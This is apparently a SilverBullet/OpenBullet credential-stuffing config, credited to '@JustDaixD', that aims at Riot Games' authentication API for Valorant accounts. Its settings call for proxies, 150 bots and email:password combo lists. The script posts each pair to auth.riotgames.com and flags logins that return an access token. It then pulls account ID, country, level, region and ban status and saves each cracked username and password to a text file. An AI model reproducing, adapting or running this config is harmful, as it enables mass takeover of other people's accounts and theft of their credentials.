[SETTINGS]
{
  "Name": "Valorant {In-Game Api}",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-08-03T09:45:41.9027765+05:30",
  "AdditionalInfo": "Config made by @JustDaixD",
  "RequiredPlugins": [],
  "Author": "Just Dai xD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Valorant {In-Game Api}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Replace "@.*" "" UseRegex=TRUE "<USER>" -> VAR "USERR" 

FUNCTION RandomString "?l?u?u?u?l?l?l?l?u?u?l?u?d?l?d?l?d?l?d?d?l?u" -> VAR "nonce" 

REQUEST POST "https://auth.riotgames.com/api/v1/authorization" 
  CONTENT "{\"acr_values\":\"\",\"claims\":\"\",\"client_id\":\"riot-client\",\"code_challenge\":\"\",\"code_challenge_method\":\"\",\"nonce\":\"<nonce>\",\"redirect_uri\":\"http:\\/\\/localhost\\/redirect\",\"response_type\":\"token id_token\",\"scope\":\"openid link ban lol_region\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: auth.riotgames.com" 
  HEADER "user-agent: RiotClient/36.0.0.3866646.3843696 rso-auth (Windows;10;;Professional, x64)" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 

REQUEST PUT "https://auth.riotgames.com/api/v1/authorization" 
  CONTENT "{\"language\":\"en_US\",\"password\":\"<PASS>\",\"region\":null,\"remember\":false,\"type\":\"auth\",\"username\":\"<USERR>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: auth.riotgames.com" 
  HEADER "user-agent: RiotClient/36.0.0.3866646.3843696 rso-auth (Windows;10;;Professional, x64)" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "auth_failure" 
  KEYCHAIN Success OR 
    KEY "access_token" 

#access_token PARSE "<SOURCE>" LR "access_token=" "&" -> VAR "access_token" 

REQUEST GET "https://auth.riotgames.com/userinfo" 
  
  HEADER "Host: auth.riotgames.com" 
  HEADER "user-agent: RiotClient/30.0.1.3715678.3712489 rso-auth (Windows;10;;Professional, x64)" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 

#Username PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Username" 

#Game_Name PARSE "<SOURCE>" JSON "game_name" CreateEmpty=FALSE -> CAP "Game Name" 

#Tag_Line PARSE "<SOURCE>" JSON "tag_line" CreateEmpty=FALSE -> CAP "Tag Line" 

#Level PARSE "<SOURCE>" JSON "summoner_level" CreateEmpty=FALSE -> CAP "Level" 

#Account_ID PARSE "<SOURCE>" JSON "pvpnet_account_id" CreateEmpty=FALSE -> CAP "Account ID" 

#Country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

PARSE "<SOURCE>" JSON "cpid" -> VAR "reg" 

#NickName PARSE "<SOURCE>" JSON "summoner_name" CreateEmpty=FALSE -> CAP "NickName" 

#Email_Verified PARSE "<SOURCE>" JSON "email_verified" CreateEmpty=FALSE -> CAP "Email Verified" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "ban\":{\"code\":null" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Player banned" 
  KEYCHAIN Failure OR 
    KEY "<reg>" Contains "LA" 

FUNCTION Translate 
  KEY "BR1" VALUE "BR" 
  KEY "EUN1" VALUE "EUN" 
  KEY "EUW1" VALUE "EUW" 
  KEY "JP1" VALUE "JP" 
  KEY "KR" VALUE "KR" 
  KEY "LA1" VALUE "LAN" 
  KEY "LA2" VALUE "LAS" 
  KEY "NA1" VALUE "NA" 
  KEY "OC1" VALUE "OCE" 
  KEY "PBE1" VALUE "PBE" 
  KEY "RU" VALUE "RU" 
  KEY "TR1" VALUE "TR" 
  "<reg>" -> CAP "Region" 

FUNCTION Constant "@JustDaixD" -> CAP "Config made by" 

UTILITY File "Valorant.txt" AppendLines "USERNAME: <USERR> | PASSWORD: <PASS> | Account ID: <Account ID> | Country: <Country> | NickName: <NickName> | EmailVerified: <Email Verified> | Region: <Region> | Config By @JustDaixD" -> VAR "save" 

